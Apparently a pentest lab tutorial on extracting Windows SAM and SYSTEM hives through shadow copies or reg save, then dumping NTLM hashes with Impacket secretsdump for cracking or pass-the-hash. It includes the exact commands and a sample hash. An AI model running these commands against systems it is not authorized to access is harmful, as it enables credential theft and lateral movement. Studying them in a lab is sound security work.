koroc@lab: ~/notes/local_windows_credentials

Local Windows Credentials - SAM

$ educational pentest lab notes · do not use on systems you don't own

Windows

SAM

VSS

Registry Hives

Impacket

0x01 — Local vs Domain Accounts

Local accounts are stored on the machine itself, while Domain accounts are stored centrally in Active Directory.

This note focuses on local credentials and how to obtain their hashes from the Security Account Manager (SAM) for offline analysis in a lab.

0x02 — Security Account Manager (SAM)

The SAM database stores:

Local usernames
LM / NTLM password hashes
RIDs and related metadata

File locations:

C:\Windows\System32\Config\SAM

C:\Windows\System32\Config\SYSTEM

The SYSTEM hive contains the BootKey used to decrypt the SAM contents.

0x03 — Access the Target

RDP into the Windows machine using the provided lab credentials.

All following commands must be run from an Administrator command prompt.

0x04 — Method 1: Volume Shadow Copy Service (VSS)

Create a snapshot and copy SAM/SYSTEM from it.

Create a shadow copy of C:\

wmic shadowcopy call create Volume='C:\'

List existing shadow copies

vssadmin list shadows

Look for a path similar to: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Copy SAM and SYSTEM from the shadow copy

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SAM C:\Users\Administrator\Desktop\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\Config\SYSTEM C:\Users\Administrator\Desktop\system

Transfer both files (sam and system) to your Kali machine (SCP, SMB, etc.).

0x05 — Method 2: Registry Hive Export

Dump live registry hives that mirror SAM and SYSTEM.

Export SAM and SYSTEM from registry

reg save HKLM\sam C:\Users\Administrator\Desktop\sam-reg
reg save HKLM\system C:\Users\Administrator\Desktop\system-reg

Save path example: C:\Users\Administrator\Desktop\sam-reg, C:\Users\Administrator\Desktop\system-reg

Transfer these files to Kali as well.

0x06 — Dump Hashes with Impacket (Kali)

On Kali, use secretsdump.py from Impacket.

Using raw SAM/SYSTEM files

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
  -sam sam \
  -system system \
  LOCAL

Using registry exports

python3 /usr/share/doc/python3-impacket/examples/secretsdump.py \
  -sam sam-reg \
  -system system-reg \
  LOCAL

Typical output format:

username:RID:LMHASH:NTHASH:::

The NT hash is the important one for cracking or pass‑the‑hash.

0x07 — Example Entry

Administrator:500:aad3b435b51404eeaad3b435b51404ee:98d3a787a80d08385cea7fb4aa2a4261:::

LM hash: often disabled / empty
NT hash: used for authentication, cracking, or pass‑the‑hash

Legal notice: use these techniques only on systems you own or are explicitly authorized to test. Unauthorized access is illegal and unethical.